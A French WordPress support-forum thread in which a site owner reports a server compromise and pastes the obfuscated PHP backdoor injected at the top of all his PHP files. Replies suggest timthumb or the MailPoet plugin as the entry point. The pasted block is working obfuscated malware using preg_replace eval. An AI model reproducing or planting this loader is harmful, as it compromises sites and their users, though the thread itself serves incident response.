- Statut : non résolu
- Ce sujet contient 2 réponses, 3 participants et a été mis à jour pour la dernière fois par
Flobogo, le il y a 9 années et 4 mois.
-
AuteurMessages
-
22 juillet 2014 à 13 h 55 min #539980
Bonjour,
– Version de WordPress : dernière version
– Version de PHP/MySQL :
– Thème utilisé : custom
– Extensions en place : beaucoup trop
– Adresse du site : carlboileau.comProblème(s) rencontré(s) : serveur hacké
Bonjour, l’ensemble de tous mes blogs hébergé sur un serveur professionnel à Montréal a été hacké dans la nuit entre jeudi et vendredi dernier. Il s’avère en effet qu’un code malicieux à été injecté au début de tous les fichiers PHP stocké dans mon espace accessible par FTP. En conséquence, plus aucun de mes blogs ne fonctionne correctement et je ne sais trop ce que le serveur effectue comme opération par les hackers.
Bref, je me donne aujourd’hui la journée pour réparer les pots cassés et tenter de résoudre le problème. En ce sens, je pense bien devoir réinstaller l’ensemble des blogues avec des anciennes sauvegardes. Cependant, un truc qui pourrait peut-être me sauver du temps serait de m’aider à trouver une commande qui pourrait enlever (et nettoyer) d’un coup tous le code qui a été rajouté dans mes pages PHP. Après ce nettoyage, je pourrais redémarrer mes blogs et tenter de chasser le backdoor.
Mais bon, avant de procéder, je voulais surtout avoir les conseils de la communauté afin de trouver le point d’entrée et colmater la brèche avec la bonne parade.
Encore merci pour la compréhension et le soutien dans cette épreuve des plus fastidieuses.
Carl
NB. Le code malicieux en question est partout le même dans mes 8000 pages PHP. Si vous arrivez à y comprendre quelque chose dans ce flood de charabia codé, faites-moi signe.
<?php $ekajxpckbk = '%x5c%x7825!<5h%x5c%x7825%x5c%x7825)54l}%x5c%x7827;%x5c%x7+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt5c%x7822)7gj6<*QDU%x5c%x78c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x]y33]68]y34]68]y33]65]y31]53]&6<*rfs%x5c%x78257-K)fujs%x825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bqc%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeT]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>]37]278]225]241]334]368]322]3]364]6]283]45c%x78256<*17-SFEBFI,6<*127-UVPFNJU,67824<!%x5c%x7825mm!>!#]y81]273]y76]258]>%x5c%x7822!pd%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:5672]254]y76#<%x5c%x782]212]445]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39**72!%x5c%x7827!hmg%x50{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7d}+;!>!}%x5c%x7827;!>>>!}7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x985:6197g:74985-rr.93e:5597f-s%x7825!*3!%x5c%x7827!hmg%x5;msv}.;%x5c%x782f#%x5cx7825tzw>!#]y76]277]y72]265]y39]27]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpq>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1×7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x!}6;##}C;!>>!}W;utpi}Y;tuofuopx5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%5c%x7825z-#:#*%x5c%x7824c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-%x785cq%x5c%x7825)ufttj%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x57825%x5c%x787f!~!<##!>!2p%x5c%x7825*<(<%x5c%x78e%x5c%x78b%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825c%x7825!<***f%x5c%x7827,*e%xx5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x782opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x78275c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;ggg!>!#]y81]273]y76]258]y6g]273]y76]271×7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tu5c%x7824y7%x5c%x7824-%x5c%x782c%x7878pmpusut!-#j0#!%x6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5cPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%xg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufy6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x785w6Z6<.2%x5c%x7860hA%x5c%x7827px7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)#:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y8Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,3]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x782565]D8]86]y31]278]y3f]51L3]84]L); }825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#25r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x782s!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcy6g]257]y86]267]y74]275]y7:]268]y7f#<!%=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x78.973:8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%825!<*#}_;#)323ldfid>}&;!osvufs}%x5c256|6.7eu{66~67<&w6<*&56%x75%156%x61"]=1; function fjfgg($n){return chr(ord($n)-1);%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7835]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825c25s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x5%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fwd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMMx7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&d7R17,67R37,#%x5c%x782fq%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>5t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x787825%x5c%x7878:-!%x5c%x7825tzw%x5%x78b%x5c%x7825w:!>!%x5c%x%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x7y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825#%x5c%x7824-%x5c%x7824-tusqpt)%x%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|]#>n%x5c%x7825<#372]58y]472]3x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>%x5c%x7860hA%x5c%x7827pd%x5c%x78255c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5#]D6]281L1#%x5c%x782f#M5]DgP5]D%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%)!gj!<*2bd%x5c%x7825-#1GO%x5c%xx7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782pdov{h19275j{hnpd19275fubmgoj{h1:|:Z<^2%x5c%x785c2b%x5c%x75!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w6<*)ujojR%x5c%x7827id%x5c%xx78e%x5c%x78b%x5c%x7825mm)%x5c%x5tmw!>!#]y84]275]y837824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5ebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7%x5c%x7827k:!ftmf!}Z;^nbsbqKe]53Ld]53]Kc]55Ld]55#*<%x5c7y]672]48y]#>s%x5c%x7825<#462]4x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msv56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqn21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH6%x5c%x7824-%x5c%x7824<%x5cx5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y7825hIr%x5c%x785c1^-%x5c%x78<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,#-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P882fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%xx787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**d%x5c%x78256<C%x5c%x7827pd%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x78259%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%1if((function_exists("%x6f%1%x5c%x782f#@#%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfumjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x786878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825bQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%*<%x22%51%x29%51%x29%73", NUL25#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UT:|:*r%x5c%x7825:-t%x5c%x7Y#-#D#-#W#-#C#-#O#-#N#*%%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x77%x67%42%x2c%163%x745c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5>!%x5c%x7825tdz)%x5c%c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x52<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%4-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]27K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c% ») && (!isset($GLOBALS[« %x61%156%x75%156%x61 »])))) { $GLOBALS[« %x61%1%x5c%x7825%x5c%x785cSFWSFT%x60MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7823%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7822<!gps)%x5c%x7825j>1<%]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782fc%x7825!)!gj!<2,*j%x6<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd)%x5c%x7825%x5c%x782#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x5c%x78256<pd%x5c%x7825w6Z6<.}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<tjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x5c%x78257-K)udfoopdXA%x%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp|!*!***b%x5c%x7825)sf%x5*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutj22!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%825-*.%x5c%x7825)euhA)3of>2bdy83]256]y81]265]y72]254]y76]615c%x7825!|Z~!<##!>!2p%x5c%x7825!%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x2vt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%78246767~6<Cw6<pd%x5c%x7825w6Z6<.541%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%14x7824-%x5c%x7824!>!fyqmpef)#%x5csut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%42%x5f%163%x74%141%x72%164y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sf-%x5c%x7824!>!tus%x5c%x7860sfqmbdf!%x5c%x78242178}527}88:}334}472%x5c%xL1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#c%x782f%x5c%x7824)#P#-#Q#-#B#-825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7yovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x786#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4boe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1+*!*+fepdfe{h+{d%x5c%x7825)+opjud4*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)f]63]y3:]68]y76#<%x5c%x78e%x5c25))!gj!<*#cd2bge56+99386c6f+9f5d816:+946c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5cWsfuvso!%x5c%x7825bss%x5c%x785csx5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x78#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!25)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudov/(.*)/epreg_replacewhouaguipy’; $pqaxdmyxpq = explode(chr((162-118)),’6421,27,8822,26,7517,69,3726,61,8509,54,6356,65,8696,56,7131,20,4481,64,5627,46,9655,30,4455,26,8662,34,4918,34,7813,45,7931,30,7677,48,2814,31,6222,34,3704,22,8605,57,6161,61,2235,64,479,27,3211,60,2032,39,9284,66,8137,23,149,26,7614,63,7466,51,2594,61,9857,46,9813,44,7281,67,9726,55,1879,24,2141,38,3980,70,2532,62,9239,45,6632,70,1111,47,506,65,780,37,5998,42,5250,27,8028,60,4783,40,2299,44,1624,30,4050,70,3614,54,5532,52,1158,25,3153,58,856,22,10059,47,2710,40,3419,48,8563,42,1325,27,7793,20,10008,51,1090,21,1470,53,8784,38,5096,51,5205,45,7878,53,8160,68,1523,54,5876,37,2436,43,8088,49,1965,35,5182,23,106,43,5065,31,7092,39,8358,29,0,29,1903,62,2113,28,7151,63,6448,20,6095,66,8417,32,8228,24,2509,23,4952,38,175,54,398,52,9903,68,9685,41,6944,44,2655,55,1183,58,9090,53,2179,56,8449,60,6571,61,5446,27,7586,28,4823,35,1352,22,5021,44,29,28,3668,36,1024,66,5584,43,5147,35,8252,49,2071,42,9560,33,9413,60,8301,57,4217,62,3017,69,4279,31,3305,59,8914,58,5386,60,6702,58,571,48,7961,67,3506,58,6900,44,5797,34,1374,32,2963,54,3086,67,941,21,5309,20,6517,54,3467,39,4735,48,2382,54,6289,67,4640,66,362,36,9350,63,4706,29,5501,31,4545,63,6988,25,4310,44,9006,37,817,39,2750,64,6256,33,1577,47,5329,57,1830,49,4608,32,1806,24,8972,34,7858,20,7405,61,5732,27,7037,55,2479,30,9593,62,1712,45,1757,49,8752,32,5913,57,3849,69,229,69,619,57,6804,67,4176,41,5673,59,1241,54,5970,28,3364,55,4354,68,878,63,1295,30,3564,50,3271,29,8848,66,676,63,4990,31,9473,47,5831,45,9043,47,5473,28,298,64,7260,21,2845,50,6040,55,739,41,1406,64,962,62,9781,32,9520,40,3787,62,3918,62,7214,46,6760,44,2895,68,6468,49,9173,66,7725,22,1654,58,4858,60,7348,57,5277,32,4422,33,9143,30,9971,37,7013,24,5759,38,2000,32,2343,39,7747,46,57,49,8387,30,450,29,4120,56,6871,29,3300,5′); $omririzopg=substr($ekajxpckbk,(54202-44096),(47-40)); if (!function_exists(‘vqgjwaqztt’)) { function vqgjwaqztt($cucfttfmcl, $zjthtyygms) { $hdpyretzft = NULL; for($qxicgvklsx=0;$qxicgvklsx<(sizeof($cucfttfmcl)/2);$qxicgvklsx++) { $hdpyretzft .= substr($zjthtyygms, $cucfttfmcl[($qxicgvklsx*2)],$cucfttfmcl[($qxicgvklsx*2)+1]); } return $hdpyretzft; };} $vaeiujbfdv="x2057x2a40x6e153x75141x75163x6f155x7a157x2052x2f40x65166x61154x28163x74162x5f162x65160x6c141x63145x28143x68162x2850x3261x3755x3170x3051x2954x20143x68162x2850x3564x3455x3465x3251x2954x20166x71147x6a167x61161x7a164x7450x24160x71141x78144x6d171x78160x7154x24145x6b141x6a170x70143x6b142x6b51x2951x3b40x2f52x20143x74154x6e143x79143x69141x6e40x2a57x20"; $bdtrhqmrll=substr($ekajxpckbk,(35524-25411),(60-48)); $bdtrhqmrll($omririzopg, $vaeiujbfdv, NULL); $bdtrhqmrll=$vaeiujbfdv; $bdtrhqmrll=(702-581); $ekajxpckbk=$bdtrhqmrll-1; ?><?php
22 juillet 2014 à 19 h 43 min #961955l’une des extensions utilise t elle timthumb, le fichier timthumb.php est il present sur le serveur (ou thumb.php ca dépend). Deja il faut trouver la faille avant de nettoyer….
22 juillet 2014 à 22 h 45 min #961956Ou bein le plugin Wisija / mailPoet est-il utilisé sur l’un des sites ?
Apparemment les sites infectés présentent ce type de code dans les fichiers .php infectés. -
AuteurMessages
- Vous devez être connecté pour répondre à ce sujet.